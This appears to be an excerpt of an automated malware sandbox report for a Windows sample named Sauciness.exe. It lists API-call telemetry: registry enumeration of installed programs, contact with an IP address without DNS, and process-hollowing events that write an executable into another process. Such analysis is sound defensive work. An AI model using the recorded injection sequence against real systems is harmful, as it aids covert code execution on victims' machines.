RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TonerRecoverSetup 1.0 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000009 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TonerRecoverSetup 1.0		2
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000005f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: AddressBook base_handle: 0x000005f0 key_handle: 0x000005f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: Connection Manager base_handle: 0x000005f0 key_handle: 0x000005f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: DirectDrawEx base_handle: 0x000005f0 key_handle: 0x000005f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: EditPlus base_handle: 0x000005f0 key_handle: 0x000005f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: ENTERPRISE base_handle: 0x000005f0 key_handle: 0x000005f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess June 19, 2021, 6:42 p.m.	status_code: 0x00000000 process_identifier: 3264 process_handle: 0x00000264		0	0
NtTerminateProcess June 19, 2021, 6:42 p.m.	status_code: 0x00000000 process_identifier: 3264 process_handle: 0x00000264	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 2776 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000234	1	0
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 3264 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264		3221225496
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 3312 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002a4	1	0

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 1408 manipulating memory of non-child process 3264
NtUnmapViewOfSection June 19, 2021, 6:42 p.m.	base_address: 0x00400000 region_size: 643072 process_identifier: 3264 process_handle: 0x00000264	3221225497	0
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 3264 region_size: 122880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264	3221225496	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELð,êà0lÂ} @ àm@p}O Ü\|pÀT} H.textxk l `.rsrcÜ p@@.relocÀx@B base_address: 0x00400000 process_identifier: 2776 process_handle: 0x00000234	1	1
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: P8hÜ LL4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¬StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.0<InternalNameSauciness.exe(LegalCopyright DOriginalFilenameSauciness.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ì¢êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0041a000 process_identifier: 2776 process_handle: 0x00000234	1	1
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: pÄ= base_address: 0x0041c000 process_identifier: 2776 process_handle: 0x00000234	1	1
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2776 process_handle: 0x00000234	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 19, 2021, 6:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELð,êà0lÂ} @ àm@p}O Ü\|pÀT} H.textxk l `.rsrcÜ p@@.relocÀx@B base_address: 0x00400000 process_identifier: 2776 process_handle: 0x00000234	1	1	0

Collects information about installed applications (50 out of 58 events)

Time & API	Arguments	Status
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: TonerRecover 1.00 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TonerRecover 1.00\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Versium Research 10 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Versium Research 10\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x00000648 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: TonerRecover 1.00 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TonerRecover 1.00\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Versium Research 10 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Versium Research 10\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 19, 2021, 6:42 p.m.	key_handle: 0x000005f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
